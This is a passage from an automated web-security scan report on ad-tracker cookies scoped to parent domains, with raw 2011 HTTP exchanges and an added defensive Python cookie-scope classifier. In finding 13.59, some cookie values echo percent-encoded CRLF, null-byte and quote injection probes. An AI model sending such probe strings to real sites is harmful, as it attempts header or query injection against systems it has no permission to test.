Set-Cookie: rtc_llAU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_w7zu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LT7M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8ET4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ibmm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wTpK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_p7-C=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_C_Ht=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YXIT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_V6xo=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_E5ov=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VVpm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2kNV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yUWw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qGWu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_91iO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OY3S=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6xX8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jwkV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bVdm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_JM_g=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eLi0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mLYy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_I6o-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KF7h=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ozkm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yR00=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gaZK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4z_T=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwcK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hwZ0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cwsu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_FecB=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Jmpz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_26-Y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3ECb=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oSxg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jKkg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QkL_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dzBy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fezZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QgWY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WTAw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Fw9h=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xmbE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XGlz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a4UZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wbIY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RkPu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WRdM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_40lM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_J6oy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uDVI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_anmi=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6icd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_coNK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_t_8-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOE/F7gMQlrWdY9siSkqZE680dIsPyzLv7mCqBpJakqVFftDs8Pd8XH9p7LJOwoH+goYpPfri7ZTBvzBVf7SOFPaRj1HOKpjRvpAKtGje2Y3H4h//EkEw6Msyj40HEwS7e/06Sy9s4k8kNE/WoHW1C3nb6NhUPrzhVTUm0po5pvG/x2yipyOcnl8CyX8Ph5nifpkExZWQ1HO8VTJph99aLekgIJGcAHFOegq+bzrVdQKxKeDFmBZN; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:54:35 GMT; Path=/
Set-Cookie: rtc_UUza=MLs38KNKcS5r5tIYsrgdBK11VmsPcJHEjh8FB4XxHMaJAW/yCsbueTOkM2I7/XCjGGDtu+H38Zi6DHtu6Jz2s/guplcWn9G+mKtXFNPD/GT0al2wX2OBBe5NhmRfx9Rtvi6+OYVG6B1HLTS/fubkWk/2Wr78IBEZfcQxbxZvLdlubczCSL5h9Xp2CZ5Ijou+QGBVYRzisz4PopFv7MEjzqqaMCMg8LhoUIRHIs+zFGlNMSXDVqlePNr2XGUHXlldp1DKQuzQ5FdkU0lSEeGT/NPMnqL/Dbs5RFmVr7vZtTHuI+MRsgjd+zdbPV0cdxij9ktIroXW6Um2lEkmDOqyF3jm+2i0BB6G3+YQcPhnogcX7yYHIAvY5J9uDXxtglmIJZmS+ZIPR8fGb8dBgNdnl1XQT5gJYx8ZGap1GsVz5R14Aosznra92XixAfy5jHEePiNeZRRs1lXlJ4UtJPzvobtA/LLyl1ewk7GYvp999XJW; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:54:35 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:54:35 GMT
Content-Length: 760

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['I07714_10272','I07714_10273','I07714_10456'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rs
...[SNIP]...

13.56. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzsU1dB6gb/nWtD4g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 672

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{
...[SNIP]...

13.57. http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1008211/846374105.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. In this response rtc_H9PS and rtc_96sc are only cleared; the cookies actually issued are rsi_segs_1000000 and rtc_ouyE, both with Domain=.revsci.net.

Request

GET /J06575/b3/0/3/1008211/846374105.js?D=DM_LOC%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Fpost%252F2011%252F09%252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%252F1%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.google.com%252Ftrends%252Fhottrends%253Fq%253Dnotre%252Bdame%252Bfootball%2526date%253D2011-9-3%2526sa%253DX%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_H9PS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_96sc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJZLPlvN//lxCH/uYAwhrfLSEX/SETDPrLJfdcbwXj53YnjCTmjiXQQq1X7wFKW9k6/hM5xcabUnvVsTMBn+JFsrOOXsOsyVZ24LbrPbU7Qy1eQ==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
Set-Cookie: rtc_ouyE=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIPllZLMTR5d1cXDb2nHulG0vOSeoml1m03ilSbH+UDzM8ahhkyEaJIjsQemYPTPhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRdff7eSUvvXICfDWxc4bNSGk1cDx7BeF4VVH4blUATRCMCwARw0RFX3+FxhEN+3PO9ruFkmpBvIfPIfFcuxKb+JB8G9m7Y45Nn9cxH24FRAL/5a0q4smMaLz5gxlgZJ0DWNQ=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

13.58. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-61YFdB4e9hBRs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (domain=.quantserve.com, set by pixel.quantserve.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-61YFdB4e9hBRs.gif?labels=741%2e2269%2e55541%2e300x250&media=apl&idmatch=0 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=ENMBHQHQB4FQDds0ggi_ELqlAA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EMEBBgHQBw; expires=Sat, 03-Dec-2011 01:05:08 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 04 Sep 2011 01:05:08 GMT
Server: QS

GIF89a.......,.................D..;

13.59. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Two caveats when reading this response: rpb and put_1185 carry domain=.rubiconproject.com, which is a parent of the issuing host, but rpx carries domain=.pixel.rubiconproject.com, which after the leading dot is dropped (RFC 6265) is the issuing host itself, not a parent. Also, the rpb and rpx values contain percent-encoded CRLF (%0D%0A), null (%00) and quote characters that appear to echo earlier request parameters; because they stay percent-encoded inside the Set-Cookie header they do not split the header here, but they show that the cookie contents depend on what the client sent.

Request

GET /tap.php?v=4212&nid=1185&put=2925993182975414771&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&rnd=3553767842307670945&fpid=6&nu=n&t=&sp=y&purl=&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; rdk=6291/9346; rdk15=0; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:08:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%2624831%0D%0A4e77fd0dd5f%3D1%2684555%250d%250a76073097ace%3D1%261e49b%00%0D%0A021fe9e2610%3D1%265364e6226%0D%0A20a447c6f1a%3D1%26536489345%250d%250a30a7789986a%3D1%265364c2fb0%00%0D%0Aef4d9f296de%3D1%265364%27%3D1%265364%2527%3D1%265364%00%27%3D1%265364%22%3D1%265364%3D1%264212%3D1; expires=Tue, 04-Oct-2011 01:08:20 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C4%2C29%2C%2C%267751%3D14656%2C0%2C1%2C%2C6069c2e8bf59d5d46e70329b%2624831%0D%0A4e77fd0dd5f%3D14657%2C0%2C1%2C%2C%2684555%250d%250a76073097ace%3D14657%2C0%2C1%2C%2C%261e49b%00%0D%0A021fe9e2610%3D14657%2C0%2C1%2C%2C%265364e6226%0D%0A20a447c6f1a%3D14657%2C0%2C1%2C%2C%26536489345%250d%250a30a7789986a%3D14657%2C0%2C1%2C%2C%265364c2fb0%00%0D%0Aef4d9f296de%3D14657%2C0%2C1%2C%2C%265364%27%3D14657%2C0%2C1%2C%2C%265364%2527%3D14657%2C0%2C1%2C%2C%265364%00%27%3D14657%2C0%2C1%2C%2C%265364%22%3D14657%2C0%2C1%2C%2C%264212%3D14657%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 01:08:20 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=2925993182975414771; expires=Thu, 03-Nov-2011 01:08:20 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
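The findings in this section all turn on one rule: a Set-Cookie whose Domain attribute names a strict ancestor of the issuing host is readable, and overwritable, from every host under that ancestor, which matters when the same parent domain also serves untrusted or third-party content. The following is an added example, not part of the scanner output, that applies the RFC 6265 domain-matching rules to Set-Cookie values and reproduces the classification behind this finding (host-only, same-host domain cookie, parent-scoped, or rejected by browsers), while also noting missing Secure/HttpOnly attributes. The sample header values are constructed from Set-Cookie lines shown in findings 13.60, 13.63 and 13.68 (the rpx value is shortened); the function names are this example's own.

```python
"""Classify Set-Cookie headers by scope, as a scanner would for this finding.

Added example for this report; not part of the original scanner output.
Implements the RFC 6265 domain-matching rules: a cookie without a Domain
attribute is host-only; a Domain attribute (leading dot ignored) makes the
cookie visible to that domain and every subdomain, so a Domain that is a
strict ancestor of the issuing host is "scoped to a parent". The sample
header values are constructed from Set-Cookie lines shown in this report,
one of them shortened; the function names are this example's own.
"""
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class CookieScope:
    name: str
    host: str               # host that issued the Set-Cookie
    domain: str | None      # Domain attribute without its leading dot, or None if host-only
    parent_scoped: bool     # Domain is a strict ancestor of host
    flags: list[str] = field(default_factory=list)


def parse_set_cookie(header_value: str) -> tuple[str, str, dict[str, str | None]]:
    """Split a Set-Cookie value into (name, value, {attribute-lowercased: value})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")     # only the first '=' separates name from value
    attrs: dict[str, str | None] = {}
    for attr in parts[1:]:
        if not attr:
            continue
        key, sep, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else None
    return name.strip(), value, attrs


def classify(host: str, header_value: str, scheme: str = "http") -> CookieScope:
    """Decide how widely one Set-Cookie from `host` is scoped and note weak attributes."""
    name, _value, attrs = parse_set_cookie(header_value)
    host = host.lower()
    raw_domain = attrs.get("domain")
    domain = raw_domain.lower().lstrip(".") if raw_domain else None
    flags: list[str] = []
    parent_scoped = False

    if domain is None:
        pass                                      # host-only: sent back to `host` alone
    elif domain == host:
        flags.append("Domain equals issuing host (still covers its subdomains)")
    elif host.endswith("." + domain):
        parent_scoped = True
        flags.append(f"scoped to parent domain {domain}: readable and overwritable from any *.{domain} host")
        if "." not in domain:
            flags.append("Domain is a bare top-level label; browsers reject this")
    else:
        flags.append(f"Domain {domain} does not cover {host}; browsers reject this cookie")

    if "secure" not in attrs:
        flags.append("no Secure flag" + ("" if scheme == "https" else " (issued over plain http)"))
    if "httponly" not in attrs:
        flags.append("no HttpOnly flag")
    return CookieScope(name, host, domain, parent_scoped, flags)


def audit(host: str, set_cookie_values: list[str]) -> list[CookieScope]:
    """Classify every Set-Cookie header value one response carried."""
    return [classify(host, v) for v in set_cookie_values]


def parent_scoped_names(host: str, set_cookie_values: list[str]) -> list[str]:
    """Names of the cookies a scanner would list under this finding for `host`."""
    return [c.name for c in audit(host, set_cookie_values) if c.parent_scoped]


# Constructed from Set-Cookie lines in findings 13.60, 13.63 and 13.68; the rpx value is shortened.
SAMPLE_RESPONSES: dict[str, list[str]] = {
    "pixel.rubiconproject.com": [
        "rpx=7908%3D14600%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 00:44:46 GMT; path=/; domain=.pixel.rubiconproject.com",
        "put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Wed, 14-Sep-2011 00:44:46 GMT; path=/; domain=.rubiconproject.com",
    ],
    "r.openx.net": [
        "i=4e28a2c0-3fbe-4680-b440-7249a1d4d410; expires=Tue, 03-Sep-2013 01:23:25 GMT; path=/; domain=.openx.net",
    ],
    "sitelife.usatoday.com": [
        "usatprod=R1449690983; path=/",
        "SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/",
    ],
}

if __name__ == "__main__":
    for host, values in SAMPLE_RESPONSES.items():
        for c in audit(host, values):
            scope = "parent-scoped" if c.parent_scoped else ("host-only" if c.domain is None else "domain")
            print(f"{host}: {c.name} [{scope}] {'; '.join(c.flags)}")
```

Note the two edge cases the report itself exhibits: `domain=.pixel.rubiconproject.com` set by pixel.rubiconproject.com equals the issuing host and is therefore not parent-scoped (the scanner's finding covers `rpb` and `put_*`, not `rpx`), and `usatprod=...; path=/` with no Domain attribute is a host-only cookie even though a parent-scoped `SiteLifeHost` travels in the same response. Whether a parent-scoped cookie is a real problem depends on what else lives under that parent; the scanner's "does not appear to contain session tokens" is a heuristic, so review the cookie's function rather than its name.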

13.60. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
